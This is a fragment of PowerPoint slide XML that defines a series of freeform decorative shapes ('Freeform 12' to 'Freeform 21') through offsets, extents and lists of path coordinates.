                  <a:pt x="23133" y="235202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="189267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="142744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="95667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="949" y="4807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2" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11528170" y="3067176"/>
            <a:ext cx="388620" cy="439420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="388620" h="439420">
                <a:moveTo>
                  <a:pt x="388620" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373125" y="438912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38862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3" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1085850" cy="3133725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="85725" y="3133724"/>
                </a:moveTo>
                <a:close/>
              </a:path>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="1085850" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3129904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37270" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85725" y="3133724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134179" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182040" y="3129146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229254" y="3123501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275768" y="3115690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321530" y="3105763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366487" y="3093775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410587" y="3079777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453777" y="3063821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="496006" y="3045960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537220" y="3026247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="577367" y="3004733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616396" y="2981472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="654252" y="2956516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690885" y="2929916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726242" y="2901726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760270" y="2871997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="792917" y="2840783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824131" y="2808136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="853859" y="2774107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882048" y="2738750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908647" y="2702117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="933603" y="2664260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956864" y="2625232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978376" y="2585085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998089" y="2543871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1015949" y="2501643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031904" y="2458453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1045902" y="2414354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057890" y="2369398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067816" y="2323638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075627" y="2277126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081271" y="2229913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084696" y="2182054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085850" y="2133600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108585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4" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553260" y="0"/>
            <a:ext cx="2360930" cy="1081405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2360930" h="1081405">
                <a:moveTo>
                  <a:pt x="2360640" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2351430" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2343262" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2333376" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321806" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2308590" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293762" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2277358" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259412" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2239961" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2219041" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2196685" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2172931" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2147812" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121366" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093626" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2064629" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034410" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2003005" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970448" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1936776" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1902023" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866226" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1829419" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1791639" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752919" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1713297" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1672807" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1631485" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1589366" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546486" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1502880" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1458583" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1413632" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1368061" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321905" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1275201" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1227984" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1180289" y="1081151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1132593" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085376" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1038673" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992518" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="946948" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901997" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="857702" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="814097" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="771219" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729101" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687781" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647293" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607673" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568956" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531177" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494372" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458577" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423827" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390157" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357603" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326200" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295983" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266988" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239251" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212807" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187691" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163938" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141585" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120666" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101217" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83273" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66871" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52044" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38829" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27261" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17376" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9208" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794" y="2844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5" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962150" y="752475"/>
            <a:ext cx="400050" cy="409575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="400050" h="409575">
                <a:moveTo>
                  <a:pt x="200025" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="154155" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154155" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025" y="409575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025"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16" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5500623"/>
            <a:ext cx="748030" cy="600710"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="600710">
                <a:moveTo>
                  <a:pt x="747711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="745906" y="46903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="92818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="137613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="181153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="223305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="263935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="302911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="340099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="375365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="408577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="439600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="468301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="494548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="518207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="539143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="557225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="572318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="600138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100740" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54831" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10042" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58152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7" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2014473"/>
            <a:ext cx="748030" cy="3486150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="3486150">
                <a:moveTo>
                  <a:pt x="0" y="18615"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10046" y="15852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54834" y="7134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100741" y="1805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="1932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="7258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="15972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="27941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="43031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="61109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="82042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="105696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="131938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="160635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="191654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="224861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="260123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="297306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="336278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="376906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="419054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="462592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="507384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="745906" y="553299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="600201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="348615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8" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5567426"/>
            <a:ext cx="938530" cy="790575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="790575">
                <a:moveTo>
                  <a:pt x="938211" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="936768" y="48153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="95543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="142088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="187705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="232312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="275825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="318161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="359239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="398975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="437286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="474091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="509306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="542848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="574635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="604584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="632613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="658638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="682577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="704348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="723867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="741052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="755820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="768088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="790511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99476" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52079" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5528" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="776600"/>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9" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1766823"/>
            <a:ext cx="938530" cy="3801110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="3801110">
                <a:moveTo>
                  <a:pt x="0" y="13911"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5532" y="12737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52082" y="5716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99477" y="1442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="5843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="12864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="22550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="34818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="49586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="66772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="86291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="108062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="132002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="158029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="186059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="216009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="247798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="281343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="316560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="353367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="391682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="431421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="472502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="514843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="558360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="602971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="648594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="695145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="936768" y="742542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="790701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="380060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0" name="Freeform 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5624512"/>
            <a:ext cx="1129030" cy="981075"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="981075">
                <a:moveTo>
                  <a:pt x="1128711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1127580" y="47533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="94484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="140798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="186427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="231317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="275417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="318677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="361045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="402469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="442898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="482281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="520566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="557701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="593636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="628319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="661699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="724343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="753505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="781157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="807249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="831730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="854547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="875650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="894987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="912506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="928157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="941888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="953648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="963384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6837" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96989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1" name="Freeform 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1509649"/>
            <a:ext cx="1129030" cy="4115435"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="4115435">
                <a:moveTo>
                  <a:pt x="0" y="11177"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6837" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="1131"/>
                </a:lnTo>
